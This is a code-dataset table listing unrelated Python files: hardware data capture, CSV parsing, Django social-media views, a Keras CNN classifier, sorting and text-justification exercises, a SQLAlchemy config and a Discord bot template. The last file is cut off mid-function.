index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
13,100 | 77e2faf3ca58fdfcd776fbf11975f1b7c817a28c | '''
AD9434-FMC-500EBZ super simple data capture example
Tested on ZC706 board.
'''
import sys
try:
import iio
except:
print ("iio not found!")
sys.exit(0)
import time, struct
import numpy as np
import matplotlib.pyplot as plt
# Number of samples captured per buffer refill (also the FFT length).
bufflen = 8192
# Setup Context
my_ip = 'ip:192.168.2.1' # Pluto's default
# NOTE(review): this immediately overwrites the Pluto default above --
# should be taken from a command-line argument instead.
my_ip = 'ip:10.54.6.13' # Change to command-line argument
try:
    ctx = iio.Context(my_ip)
except:
    print("No device found")
    sys.exit(0)
# NOTE(review): "ad9571-4" looks like a typo for the AD9517-4 clock chip
# used on this FMC card -- confirm against `iio_info`.
clock = ctx.find_device("ad9571-4")
rxadc = ctx.find_device("cf-ad9467-core-lpc") # RX/ADC Core in HDL for DMA
v0 = rxadc.find_channel("voltage0")
v0.enabled = True
rxbuf = iio.Buffer(rxadc, bufflen, False) # False = non-cyclic buffer
for j in range(5): #Flush buffers.
    rxbuf.refill()
x = rxbuf.read()
# got our data, clean up...
del rxbuf
del ctx
# get data from buffer: reinterpret the raw bytes as signed 16-bit samples
data = np.frombuffer(x, np.int16)
# Full-scale amplitude of the 12-bit converter (used as the dBFS reference).
adc_amplitude = 2**12
window = np.blackman(bufflen) / sum(np.blackman(bufflen)) # Window function, normalized to unity gain
data_nodc = data - np.average(data)  # remove DC offset before windowing
windowed_data = window * data_nodc
freq_domain = np.fft.fft(windowed_data)/(bufflen) # FFT
freq_domain_magnitude = np.abs(freq_domain) # Extract magnitude
freq_domain_magnitude *= 2  # fold in the negative-frequency half's energy
freq_domain_magnitude_db = 20 * np.log10(freq_domain_magnitude/adc_amplitude)
# Plot: time-domain samples on top, FFT magnitude (dB) below.
plt.figure(1)
plt.clf()
plt.subplot(2,1,1)
fig = plt.gcf()
fig.subplots_adjust(right=0.68)
plt.plot(data)
plt.title('Ch0: Time Domain Samples')
plt.subplot(2,1,2)
fig = plt.gcf()
fig.subplots_adjust(right=0.68)
plt.plot(freq_domain_magnitude_db)
plt.title('Ch1: FFT')
plt.show()
13,101 | cf91715e4809002b13b89f814a75519ddb5f9ef8 | import pandas
def get_headered_csv_dataframe(path):
    """Parse a CSV file that carries a free-form metadata header.

    Header lines are collected into a ``metadata`` dict until a sentinel
    line ('Long term averages' or 'BLEACH THRESHOLDS') marks the start of
    the tabular section, which is handed (from the current file position)
    to ``pandas.read_csv``.

    Args:
        path: filesystem path of the headered CSV file.

    Returns:
        Tuple ``(metadata, dataframe)``.
    """
    with open(path, 'r') as f:
        metadata = {}
        # Fix: ``key`` was previously referenced before assignment, so a
        # continuation line appearing before any all-caps key line raised
        # NameError.  Initialize it and skip such stray lines instead.
        key = None
        for line in f:
            line = line.strip()
            if not line:
                continue
            elif line in ('Long term averages', 'BLEACH THRESHOLDS'):
                break
            elif line.startswith('STATION,'):
                value = line.partition(',')[-1]
                try:
                    # HACK: It seems the longitude is listed
                    # under STATION for the thresholds data!
                    float(value)
                    metadata['LONGITUDE'] = value
                except ValueError:
                    metadata['STATION'] = value
            elif line.startswith('LATITUDE,'):
                metadata['LATITUDE'] = line.partition(',')[-1]
            elif line.isupper():
                # An all-caps line starts a new metadata section.
                key = line
            elif line:
                if key is None:
                    # Stray header text before any section key: ignore.
                    continue
                if key in metadata:
                    metadata[key] += '\n'+line
                else:
                    metadata[key] = line
        return metadata, pandas.read_csv(f)
if __name__ == '__main__':
print(get_headered_csv_dataframe('data_csv_days/1_days.csv'))
print()
print(get_headered_csv_dataframe('data_csv_avgtemp/1_avgtemp.csv'))
|
13,102 | 5fdfd6783f1c0c2285bcc2219cfadb76f1d8b8af | from apscheduler.schedulers.background import BackgroundScheduler
from . import cron
scheduler = BackgroundScheduler()
scheduler.start()
def start():
    """Attach the recurring jobs to the module-level scheduler.

    The scheduler itself is already running (``scheduler.start()`` above);
    calling this only registers the jobs.
    """
    global scheduler
    # scheduler.add_job(cron.startit, 'interval', seconds=3)
    # scheduler.add_job(cron.startit, 'interval', hours=23)
    # Run cron.updateit every 50 seconds.
    scheduler.add_job(cron.updateit, 'interval', seconds=50)
|
13,103 | 2ead00d76b6543bfcd19b9c2b2664a7d06382216 | # Create your views here.
from django.http import HttpResponse
from django.http import HttpResponseRedirect
def index(request):
    """Plain-text landing response for the polls index."""
    greeting = "Hello, world. You're at the poll index."
    return HttpResponse(greeting)
# recall or note that %s means, "subsitute in a string"
def detail(request, poll_id):
    """Placeholder detail page that interpolates the poll id into markup."""
    body = "You're looking at poll <strong> %s. </strong>" % (poll_id,)
    return HttpResponse(body)
def results(request, poll_id):
    """Placeholder results page for the given poll id."""
    body = "You're looking at the results of poll <strong> %s. </strong>" % (poll_id,)
    return HttpResponse(body)
def vote(request, poll_id):
    """Placeholder voting page for the given poll id."""
    body = "You're voting on poll <u> %s. </u>" % (poll_id,)
    return HttpResponse(body)
def redirect_to_polls(request):
    """Send the client to the polls index with an HTTP redirect."""
    target = '/polls/'
    return HttpResponseRedirect(target)
13,104 | 8406c2656e297a5c1ce84259db25e2ee9517b73d |
##
# Bucket sorting of the array. Implicit assumption that all
# elements are less than 100
##
def bucketSort(array):
    """Sort a list of numbers with a 10-bucket bucket sort.

    Each value is routed to a bucket by its tens digit, every bucket is
    sorted individually, and the buckets are concatenated in order.

    Fix/generalization: the original indexed ``int(element / 10)`` directly,
    so any element >= 100 (or a sufficiently negative one) raised IndexError
    despite the "less than 100" assumption being undocumented at the call
    site.  The bucket index is now clamped to [0, 9]; correctness is kept
    because out-of-range values all land in the first/last bucket, which is
    fully sorted before concatenation.

    Args:
        array: iterable of numbers (ints or floats).

    Returns:
        A new list containing the elements in ascending order.
    """
    buckets = [[] for _ in range(10)]
    for element in array:
        # Clamp: values < 0 map to bucket 0, values >= 100 to bucket 9.
        bucketNumber = min(max(int(element / 10), 0), 9)
        buckets[bucketNumber].append(element)
    returnArray = []
    for bucket in buckets:
        bucket.sort()
        returnArray.extend(bucket)
    return returnArray
print(bucketSort([2,1,62,34,26,53,26,57,3]))
|
13,105 | cfce672ae58e0f5beb73a86d785727806d57aebd | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import setuptools
# Read the release version from the VERSION file next to this script.
# Fix: the original opened the file without ever closing it; the context
# manager guarantees the handle is released.
with open(os.path.join(".", "VERSION")) as version_file:
    version = version_file.read().strip()
download_url = \
'https://github.com/dudektria/pnictogen/archive/{:s}.tar.gz'.format(version)
doclines = """pnictogen: input generation for computational chemistry packages
pnictogen is a Python library that generates input files for computational
chemistry packages.
""".split("\n")
# Chosen from http://www.python.org/pypi?:action=list_classifiers
classifiers = """Development Status :: 3 - Alpha
Environment :: Console
Intended Audience :: Science/Research
Intended Audience :: Education
Intended Audience :: Developers
License :: OSI Approved :: MIT License
Natural Language :: English
Operating System :: OS Independent
Programming Language :: Python
Programming Language :: Python :: 3
Topic :: Scientific/Engineering :: Chemistry
Topic :: Education
Topic :: Software Development :: Libraries :: Python Modules"""
keywords = [
'science',
'research',
'chemistry',
]
install_requires = [
'nose',
'parse',
'pyyaml',
'jinja2',
'openbabel',
]
setuptools.setup(
name='pnictogen',
version=version,
url='https://github.com/dudektria/pnictogen',
download_url=download_url,
author='Felipe Silveira de Souza Schneider',
author_email='schneider.felipe@posgrad.ufsc.br',
license='MIT',
description=doclines[0],
long_description="\n".join(doclines[2:]),
classifiers=classifiers.split("\n"),
packages=setuptools.find_packages(exclude=['*test*']),
keywords=keywords,
install_requires=install_requires,
include_package_data=True,
test_suite='nose.collector',
entry_points={
'console_scripts': [
'pnictogen = pnictogen:main',
],
},
)
|
13,106 | 8d1a99a738b13c2effeb8072edc55426ec4c4977 | from django.shortcuts import render, redirect
from MyApp import connections as conn
from MyApp import constants
from MyApp.models import *
import json
import pymongo
# Create your views here.
# index page
def Homepage(request):
    """Render the landing page template."""
    return render(request,'index.html')
def getTwitter(request):
    """Refresh the stored tweets, then bounce the client back to the homepage.

    Fix: ``Twitter_data`` takes a required ``request`` parameter; the
    original called it with no arguments, which raised TypeError on every
    request.  Its rendered response is intentionally discarded -- this view
    only triggers the refresh and redirects.
    """
    Twitter_data(request)
    return redirect('/')
def Twitter_data(request):
    """Rebuild the tweet cache from the timeline of Twitter user 32968470.

    Drops the Mongo collection, refetches the timeline, stores every status
    in Mongo and in the Django ``twitter`` model, and renders twitter.html
    with all stored tweets.
    """
    # Start from an empty Mongo collection so the cache is fully rebuilt.
    conn.twitterCol.drop()
    i = 1
    for status in conn.twitterAPI.user_timeline(user_id='32968470'):
        print(status)
        tweetData = {
            "status_num": i,
            "status_text": status.text,
            "status_name": status.user.name,
            "status_created_at": status.created_at,
            "status_favourate_Count": status.favorite_count,
            "status_lang": status.lang
        }
        conn.twitterCol.insert_one(tweetData)
        # NOTE(review): recreating this index on every iteration is
        # redundant (create_index is idempotent) -- it belongs outside
        # the loop.  Also unclear why the 'heights' collection is indexed
        # here; confirm intent.
        conn.db.heights.create_index([('name', pymongo.ASCENDING)], unique=True)
        print(tweetData['status_text'])
        i+=1
        # Mirror the tweet into the relational Django model as well.
        cc = twitter.objects.create(status_num=tweetData['status_num'],status_name=tweetData['status_name'], status_text=tweetData['status_text'],
                                    status_created_at=tweetData['status_created_at'],status_favourate_Count=tweetData['status_favourate_Count'], status_lang=tweetData['status_lang'])
        cc.save()
    tweets = twitter.objects.all()
    context = {
        "tweet":tweets
    }
    return render(request,'twitter.html', context)
def getTumblerdata(request):
    """Rebuild the Tumblr post cache and render tumbler.html.

    Pulls the posts of the configured blog, stores one summary document in
    Mongo, mirrors post data into the Django ``trumbler`` model, and renders
    the listing template.
    """
    conn.tumblerrCol.drop()
    data = conn.tumblrClient.posts(constants.tumblr.BLOG_NAME)
    postdata = []
    p = data['posts']
    print(p)
    i =1
    for element in p:
        traildata = element['trail']
        blogContent = ""
        for blog in traildata:
            # Keeps only the content of the LAST trail entry.
            blogContent = blog['content']
        # NOTE: ``data`` is rebound here, shadowing the API response above.
        data = {
            "post_number": i,
            "post_type": element['type'],
            "post_url": element['post_url'],
            "post_created_at": element['date'],
            "post_tittle": element['summary'],
            "post_content": blogContent
        }
        postdata.append(data)
        print(data)
        i+=1
    final_data = {"post_data":postdata}
    conn.tumblerrCol.insert_one(final_data)
    # NOTE(review): at this point ``data`` is only the LAST post from the
    # loop, so a single row reaches the Django model -- confirm whether this
    # create() was meant to run inside the loop.
    ff = trumbler.objects.create(status_num=data['post_number'],status_name=data['post_type'], status_text=data['post_tittle'],
                                 status_created_at=data['post_created_at'],status_favourate_Count=data['post_content'], status_lang=data['post_url'])
    ff.save()
    tt = trumbler.objects.all()
    context = {
        "tt":tt
    }
    return render(request, 'tumbler.html', context)
13,107 | 0a2b4833f6a7df1bc713e11ebdb9a924b3b8e09f | import mcutk
from mcutk.apps import appfactory
# Look up the IAR toolchain registration and report its newest installed copy.
App = appfactory('iar')
app = App.get_latest()
# Fix: the originals were Python-2-only print statements; the parenthesized
# calls behave identically on Python 2 (single argument) and also run on 3.
print(app.version)
print(app.path)
print(app.is_ready)
13,108 | 24eb052c55ff38b76554ef46d5907664d4b8ffc3 | class Student:
school="DNS"
def __init__(self,m1,m2,m3):
self.m1=m1
self.m2=m2
self.m3=m3
def avg(self):
return (self.m1+self.m2+self.m3)/3
@classmethod #class method
def schooldet(cls):
cls.school="Subharti"
return cls.school
@staticmethod
def info():
print("this is the static method")
s1=Student(67,89,42)
s2=Student(76,98,69)
print(s2.avg(),Student.school)
print(s1.avg(),Student.schooldet())
s1.info()
|
13,109 | 3847ec095302e8a39f3b1f2df7cd487c169e84b4 | class Solution:
def fullJustify(self, words: List[str], maxWidth: int) -> List[str]:
if(words):
len_words = len(words)
if(len_words==1):
s = words[0]
s = s + " "*(maxWidth - len(s))
l=[]
l.append(s)
return l
else:
c = 0
i=0
ans = []
while(i<len_words):
len_temp = 0
l=[]
while(True and i<len_words):
my = words[i]
len_temp = len_temp + len(my) + 1
# print(my,len_temp)
if(len_temp>maxWidth+1):
break
l.append(my)
i = i + 1
ans.append(l)
l = []
for i in range(0,len(ans)-1):
len_ = 0
temp = ans[i].copy()
len_ans = len(temp)
for rec in temp:
len_ = len_ + len(rec)
if(len_ans==1):
ans[i].append(" "*(maxWidth-len(rec)))
else:
spaces = maxWidth - len_
equall = spaces//(len_ans - 1)
remaining = spaces % (len_ans-1)
for j in range(1,(len_ans*2) - 1,2):
if(remaining==0):
ans[i].insert(j," "*equall)
else:
ans[i].insert(j," "*(equall+1))
remaining = remaining -1
s=''
for rec in (ans[-1]):
s = s + rec + " "
len_s = len(s)
if(len_s>maxWidth):
s = s[0:maxWidth]
else:
s = s + " "*(maxWidth - len_s)
for i in range (len(ans)-1):
temp = ''
for rec in ans[i]:
temp = temp + rec
l.append(temp)
l.append(s)
return l
|
13,110 | e57b7854247602ccb4399bb4fa8f03a1d71ea4c3 |
class Eva2Simulation:
    """Metadata and results of one EVA2 crop-rotation simulation run.

    German domain terms: Standort = site, Fruchtfolge = crop rotation,
    Anlage = trial layout, Fruchtfolgeglied = rotation member.
    NOTE: ``display`` uses a Python 2 print statement, so this module
    targets Python 2.
    """
    def __init__(self, standort, standort_id, fruchtfolge, anlage, fruchtfolge_glied=None):
        self.__standort = standort
        self.__standort_id = standort_id
        self.__fruchtfolge = fruchtfolge
        self.__anlage = anlage
        self.__fruchtfolge_glied = fruchtfolge_glied
        # Results keyed per simulation output; filled via setResultMap.
        self.__result_map = {}
    def setStandort(self, standort):
        self.__standort = standort
    def setStandortID(self, standort_id):
        self.__standort_id = standort_id
    def setFruchtfolge(self, fruchtfolge):
        self.__fruchtfolge = fruchtfolge
    def setAnlage(self, anlage):
        self.__anlage = anlage
    def setFruchtfolgeglied(self, fruchtfolge_glied):
        self.__fruchtfolge_glied = fruchtfolge_glied
    def setResultMap(self, result_map):
        self.__result_map = result_map
    def display(self):
        # Print a one-line human-readable summary (Python 2 syntax).
        print "EVA2 Simulation: ", self.__standort_id, " ",self.__standort, ", FF",self.__fruchtfolge, ", Anlage", self.__anlage
    def getStandort(self):
        return self.__standort
    def getStandortID(self):
        return self.__standort_id
    def getFruchtfolge(self):
        return self.__fruchtfolge
    def getAnlage(self):
        return self.__anlage
    def getFruchtfolgeglied(self):
        return self.__fruchtfolge_glied
    def getResultMap(self):
        return self.__result_map
"""
"""
class OptimizationConfig:
    """Configuration for optimizing one crop: id, name and its simulations."""
    def __init__(self, crop_id, crop_name):
        self.__crop_id = crop_id
        self.__crop_name = crop_name
        self.__simulation_list = []
        # NOTE(review): ``output`` and ``error`` below are plain locals --
        # they are built and then discarded, never assigned to ``self``.
        # Presumably they were meant to become attributes (enabled output
        # variables and error metrics); confirm before relying on them.
        output = {}
        output["Ertrag"] = True
        output["Zwischenernte"] = True
        output["Bedgrad"] = True
        output["Hoehe"] = True
        output["Ertrag_N"] = True
        output["Zwischenernte_N"] = True
        output["Nmin30"] = True
        output["Nmin60"] = True
        output["Nmin90"] = True
        output["Wasser30"] = True
        output["Wasser60"] = True
        output["Wasser90"] = True
        error = {}
        error["rmse"] = True
        error["mae"] = True
        error["nmae"] = True
        error["nrmse"] = True
    def setCropID(self, crop_id):
        self.__crop_id = crop_id
    def setCropName(self, crop_name):
        self.__crop_name = crop_name
    def setSimulationList(self, list):
        # NOTE(review): parameter shadows the builtin ``list``.
        self.__simulation_list = list
    def getCropID(self):
        return self.__crop_id
    def getCropName(self):
        return self.__crop_name
    def getSimulationList(self):
        return self.__simulation_list
class FF:
    """Simple record pairing a crop rotation (ff) with one rotation member."""

    def __init__(self, ff, ff_glied):
        self.ff, self.ff_glied = ff, ff_glied
13,111 | 6a70ada651bcafcd75b8032640331f6d194eaacb | from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
SQLALCHEMY_DATABASE_URL = "sqlite:///./sql_app.db"
# SQLALCHEMY_DATABASE_URL = "postgresql://user:password@postgresserver/db"
# connect_args={"check_same_thread": False} is required only for SQLite
engine = create_engine(SQLALCHEMY_DATABASE_URL, connect_args={"check_same_thread": False})
# Session factory for the DB.  Each instance of this class is a new session.
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
# Base class for declaring ORM models
Base = declarative_base()
|
13,112 | c343c8d68b373dfdd6969cea328d715381def28e | from keras import layers
from keras import models
from keras import optimizers
from keras.preprocessing.image import ImageDataGenerator
import pickle
import conf
# Small CNN (four conv/pool stages) for binary image classification on
# 150x150 RGB images.
model = models.Sequential()
model.add(layers.Conv2D(32, (3, 3), activation='relu',
                        input_shape=(150, 150, 3)))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(128, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(128, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Flatten())
model.add(layers.Dense(512, activation='relu'))
# Single sigmoid unit -> probability of the positive class.
model.add(layers.Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy',
              optimizer=optimizers.RMSprop(lr=1e-4),
              metrics=['acc'])
# All images will be rescaled by 1./255
train_datagen = ImageDataGenerator(rescale=1./255)
test_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_directory(
        # This is the target directory
        conf.train_dir,
        # All images will be resized to 150x150
        target_size=(150, 150),
        batch_size=20,
        # Since we use binary_crossentropy loss, we need binary labels
        class_mode='binary')
validation_generator = test_datagen.flow_from_directory(
        conf.validation_dir,
        target_size=(150, 150),
        batch_size=20,
        class_mode='binary')
hist = model.fit_generator(
        train_generator,
        steps_per_epoch=conf.steps_per_epoch,
        epochs=conf.epochs,
        validation_data=validation_generator,
        validation_steps=50)
# Persist the trained weights and the training curves.
model.save('model.h5')
# NOTE(review): the file handle below is never explicitly closed -- a
# ``with open(...)`` would be safer.
pickle.dump(hist.history, open('history.p', 'wb'))
|
13,113 | 6e070ec7c512957ae19f2a7bf6933dd58fef378c | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 29 00:11:38 2019
@author: eric
"""
#Partie 1 -
"""la premier etape ici est d'importer les librairie qui nous aiderons dans
l'importation et le traitements sur nos differentes images."""
""" initialisation ANNs"""
from keras.models import Sequential
"""operation de convolution"""
from keras.layers import Convolution2D
"""Pooling reduction image"""
from keras.layers import MaxPooling2D
"""flattenign pour applatir pour entrer ANN"""
from keras.layers import Flatten
""" pour ajouter des couche cachée et connecter"""
from keras.layers import Dense
from keras.layers import Dropout
# initialisation du CNN de neurone a convolution comme les ANNs
classifier = Sequential()
# step 1: convolution ajout de la couche de convolution
"""
- dans cette partie pour la creation de notre couche de convolution nous
devons definir dans cette etape le nombre de feature detector que nous allons
utiliser elle correspond en meme temps au nombre de features maps que nous allonsq
creer car pour chaque features detector correspond un features maps donné
- filters= dimensioanlité espace de sortie === nombre de feature detector c'est dire de filtre
comme remarque ici si nous avons une deuxieme couche de convolution, alors le nombre de filtre dois
doubler normalement c'est a dire 64 dans autre ccas ainsi de suite. cella tu peux expliquer
-kernel_size= elle correspond a la taille de la matricfe de notre filters
sa pouvais etre de la forme [3, 3] ou [3,5...]
-strides= taille de deplacement de pixel 1 ou 2 quand on effectue l'operation de convolution
-inpur_shape= permet de definir la taille de nos image a lire(forcer les image a adopter le meme format) et le second
argument 3 permet de dire que nous manipulons des images couleurs RGB
-activation= pour ajouter de la non lineariter dans le modele
permet de remplacer toutes les valeurs négative par des 0.
-relu correspond a la fonction redresseur comme fonction d'activation
"""
classifier.add(Convolution2D(filters=32, kernel_size=3, strides=1,
input_shape=(200, 200, 3),
activation = "relu"))
# step 2: Pooling
"""
elle consiste a prendre la feauture maps que nous avons obtenue juste avant
l'etape de convolution et on va prendre les case 2/2 on construit comme sa jusqu'aobtenir
un plus petit resultat
- pool_size=permet de definir la taille de notre matrice de selection du maximun
"""
classifier.add(MaxPooling2D(pool_size=(2,2)))
# ajout de la nouvelle couche de convolution faut pas oublier son pooling
classifier.add(Convolution2D(filters=64, kernel_size=3, strides=1,
activation = "relu"))
classifier.add(MaxPooling2D(pool_size=(2,2)))
# a present pour melanger les deux couche de convolution on dois multiplier par 64 filtre a present 32*2
classifier.add(Convolution2D(filters=128, kernel_size=3, strides=1,
activation = "relu"))
classifier.add(MaxPooling2D(pool_size=(2,2)))
# step 3: Flattening
"""
-phase d'applatissage pour obtenir des input pour notre ANNs
elle se fait a la fin pour permettre de renseigner de bonne information au neurone
"""
classifier.add(Flatten())
# step 4: ANNs completement connecté
"""
- Dense = permet d'ajouter une couche de neurone caché
-units= nombre de neurone qui appartiennent a la couche
dans le cas des reseaux de neurone artificielle
on a dis que nous pouvions prendre le nombre de variable ici nous ne poiuvons
pas definir normalement
alors dans notre cas on aura bcp de features faut prendre les nombre
puissance de 2 sa marche tres bien
-activation= represente la fonction d'activation pour cette couche
- relu est tres utiliser pour sa particularité d'etre stricte
soit elle laisse passer le signal ou non
"""
classifier.add(Dense(units=256, activation="relu"))
classifier.add(Dropout(rate=0.3))
classifier.add(Dense(units=256, activation="relu"))
classifier.add(Dropout(rate=0.3))
classifier.add(Dense(units=256, activation="relu"))
classifier.add(Dropout(rate=0.3))
# definiton de la couche de sortie de notre reseau de neurone a convolution
"""
- pour la couche de sortir puisque
nous somme tjr dans le contexte de classification
alors nous utilisons la fonction sigmoid sinon on aurais utiliser dans un cadre c
catégorielle la fonction softmax et nous avons juste besoin de 1 neurpne
"""
classifier.add(Dense(units=6, activation="softmax"))
# etape de compilation de notre reeseau de neurone.
"""
- optimizer= correspond a l'algorithme de macine learning a utiliser pour la classification
adam correspond au stochastique de merde
-loss= represente la fonction de cout binary_cross.. pour la classification et categorical_cros... pour la regression
-metrics= "accuracy"
"""
classifier.compile(optimizer="adam", loss="categorical_crossentropy",
metrics=['accuracy'])
#########################################################
# Entrainement de notre réseaux de neurone a convolution#
#########################################################
"""
- faut aller lire dans la documentation de keras a keras documentation
- augmentation d'image : permet d'eviter le surentrainement sur le jeux de donné il permet de
modifier le jeux de donnée de toutes les formes et de transformer les images et nous permettra d'avoir beaucoup plus
d'image differente
"""
from keras.preprocessing.image import ImageDataGenerator
train_datagen = ImageDataGenerator(
rescale=1./255,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True)
test_datagen = ImageDataGenerator(rescale=1./255)
training_set = train_datagen.flow_from_directory(
'data/photos/train_pic',
target_size=(200, 200),
batch_size=32,
class_mode='categorical')
test_set = test_datagen.flow_from_directory(
'data/photos/test_pic',
target_size=(200, 200),
batch_size=32,
class_mode='categorical')
"""
pour obtenir le nombre de validation_steps, on divise le nombre de donnée
du dataset par le nombre de batch_size::::: 2000/32....
- pour le training_set = on divise par le nombre d'observation de notre
training set par le nombre de batch_size se qui donne 8000/32=250
- pour le validation_test= ici on effectue le meme processus pour le training
set mais on prend par contre l'echantillon de test a cette fois 2000/32 = 62.5 ===63
-nous avons mentionner lors de la construction des ANNs cella permet d'evaluer le reseau au fur et a mesure qu'on l'entraine
pour ne pas l'evaluer a la fin de l'apprentissage en meme temps
ici on fais tous a la fois comme le k-cross... evaluation et ajustement de paramètre
"""
classifier.fit_generator(
training_set,
steps_per_epoch=82,
epochs=10,
validation_data=test_set,
validation_steps=10)
# Evaluate the trained model on the held-out test generator.
# Fix: the original passed an undefined name ``generator`` (NameError at
# runtime); the test data generator built above is ``test_set``.
classifier.evaluate_generator(test_set, steps=None, callbacks=None, max_queue_size=10, workers=1, use_multiprocessing=False, verbose=0)
#pour enregistrer le model apres entrainement
classifier.save('train_avec_cnn_accuracy_faible.h5')
"""pour ouvrir le fichier apres entrainement on utilise le classifier.load()"""
# dANS CETTE NOUVELLE PHASE NOUS ALLONS PASSER A LA PRÉDICTION D'ANIMAUX CHIEN OU CHAT
"""
- ici il ne s'agit pas de manipuler des matrice mais plutot des image alors nous
devons les importers dans l'endroit ou il se trouve grace a des bibliotheque de keras
- ensuite penser a dimenssionner notre images a la taille voulu
- et lancer la prediction comme avec les ANNs
"""
import numpy as np
from keras.preprocessing import image
# importation de notre image en spécifiant la taille qui correspond forcement a celle de l'entrainement
test_image = image.load_img('data/photos/inouss.png',
target_size=(200, 200))
# ajout d'une quatrieme dimenssion a notre image a l'indice 0 pour permettre l'evaluation par notre CNN
# axis permet de spécifier l'index du groupe
# car nous avons dans notre cas le premier groupe si nous avons plusieurs groupe on peut les positionner de la meme facon
test_image = np.expand_dims(test_image, axis=0)
# transformation de notre image en array un tableaux d'element
# test_image = image.img_to_array(test_image)
# prediction sur notre image chargé
result = classifier.predict(test_image)
# maintenant il nous faut spécifier a quoi correspond chaque prédiction 0,1,...,6
training_set.class_indices
# on peut maintenant mettre le resultat dans une variable et afficher
if result[0][0]==1:
prediction = "Je viens de trouver FATAO ABDOUL"
elif result[0][1]==1:
prediction = "Je viens de trouver Eric Papain MEZATIO"
elif result[0][2]==1:
prediction = "Je viens de trouver Inoussa Ouedraogo"
elif result[0][3]==1:
prediction = "Je viens de trouver JEAN SAMMUEL"
elif result[0][4]==1:
prediction = "Je viens de trouver Kenley FAVARD"
else:
prediction = "Je viens de trouver NELKA Delux"
"""
POUR AMELIORER UN MODÈLE ON PEUT :
- Changer la taille de l'image
- ajouter plusieurs couche de convolution
- ajouter de nouvelle couche de reseaux de neurone et pour eviter
de tomber dans les cas de surapprentissage alors ajouter le drop-out
pour definir le taux d'apprentissage qui permet de ne pas construire un réseaux de neurone
qui apprend trop il permet de désactiver les neurones qui apprenent trop.
- tous ses éléments permettent d'améliorer les performance de notre modèle
et eviter le surapprentissage lorsque le taux d'apprentissage sur de nouvelle
donnée est tres inférieur a celle de donnée d'entrainement.
""" |
13,114 | 578e2b394a42bd81fee3c46a47a9c9885a24859b | CSS_TO_EMOTE = {
"pennant teamtl" : ":teamliquid:",
"pennant teamsecret" : ":teamsecret:",
"pennant teamig" : ":invictus:",
"pennant teamvici" : ":vici:",
"pennant teamfnatic" : ":fnatic:",
"pennant teamtnc" : ":tnc:",
"pennant teamvp" : ":virtuspro:",
"pennant teamnavi" : ":navi:",
"pennant teamdc" : ":chaos:",
"pennant teampain" : ":paingaming:",
"pennant teamaster" : ":aster:",
"pennant teamnigma" : ":nigma:",
"pennant teambeastcoast" : ":beastcoast:",
"pennant teameg" : ":evilgeniuses:",
"pennant teama" : ":alliance:"
} |
13,115 | 5cd3749373911de8a129c057768de32c34794f4d | from __future__ import division
import numpy as np
def relperm(s, Fluid):  # Return Mw, Mo, dMw, dMo
    """Linear (straight-line) relative-permeability mobility model.

    Args:
        s: water saturation (scalar or ndarray).
        Fluid: dict with connate water 'swc', residual oil 'sor', and the
            phase viscosities 'vw' (water) and 'vo' (oil).

    Returns:
        Mw, Mo: water and oil mobilities at saturation ``s``.
        dMw, dMo: their derivatives with respect to ``s``.
    """
    # Quadratic (Corey-2) variant kept for reference:
    # S = (s-Fluid['swc'])/(1.0-Fluid['swc']-Fluid['sor'])
    # Mw = np.square(S)/Fluid['vw']
    # Mo = np.square(1.0-S)/Fluid['vo']
    # dMw = 2.0*S/Fluid['vw']/(1.0-Fluid['swc']-Fluid['sor'])
    # dMo = -2.0*(1.0-S)/Fluid['vo']/(1.0-Fluid['swc']-Fluid['sor'])
    S = (s-Fluid['swc'])/(1.0-Fluid['swc']-Fluid['sor'])
    Mw = S/Fluid['vw']
    # Fix: oil mobility is (1-S)/vo.  The original wrote ``1.0-S/Fluid['vo']``,
    # which divides only S by the viscosity.  The derivative dMo returned
    # below is exactly d/ds[(1-S)/vo], confirming the intended formula.
    Mo = (1.0-S)/Fluid['vo']
    dMw = 1.0/(Fluid['vw']*(1.0-Fluid['swc']-Fluid['sor']))
    dMo = -1.0/(Fluid['vo']*(1.0-Fluid['swc']-Fluid['sor']))
    return Mw, Mo, dMw, dMo
|
13,116 | 4d8332cb9ad77df7f4cff5f5563f870eed4a1331 | background_actions.py
import discord
import asyncio
from discord.ext.commands import Bot
from discord.ext import commands
client = Bot(description="BOT DESCRIPTION HERE", command_prefix="BOT PREFIX HERE", pm_help = False) #add_your_bot_description_with_prefix_here
@client.event
async def on_ready():
print('Logged in as '+client.user.name+'')
print('--------')
print('--------')
print('Started <BOTNAME HERE>') #add_your_bot_name_here
return await client.change_presence(game=discord.Game(name='<BOT STATUS HERE>')) #add_your_bot_status_here
def is_owner(ctx):
return ctx.message.author.id == "Your id here" #replace_it_with_your_discord_id
@client.command(pass_context = True) #command_to_stop_your_bot_using-<prefix>shutdown
@commands.check(is_owner)
async def shutdown():
await client.logout()
@client.event
async def on_member_join(member):
    """Greet a new member: prefix their nick on one server, then DM a welcome embed.

    Fix: the original registered ``on_member_join`` twice; the second
    ``@client.event`` decorator silently replaced the first, so the
    nickname logic never ran.  Both behaviors are merged into one handler.
    ``colorsys`` and ``random`` were also used without being imported.
    """
    # Local imports because the file's top-level import block lacks these.
    import colorsys
    import random

    print("In our server" + member.name + " just joined")
    if member.server.id == "ServerID here":
        # Prepend the configured symbol/text to the newcomer's nickname.
        nickname = 'symbol/text here' + member.name  # add_the_symbol_or_text_that_u_wanna__your_bot_add_before_a_member's_name_when_he/she_joins_your_server
        await client.change_nickname(member, nickname)
    # Random fully-saturated hue for the embed's colour strip.
    r, g, b = tuple(int(x * 255) for x in colorsys.hsv_to_rgb(random.random(), 1, 1))
    embed = discord.Embed(color = discord.Color((r << 16) + (g << 8) + b))
    embed.set_author(name='Welcome message')
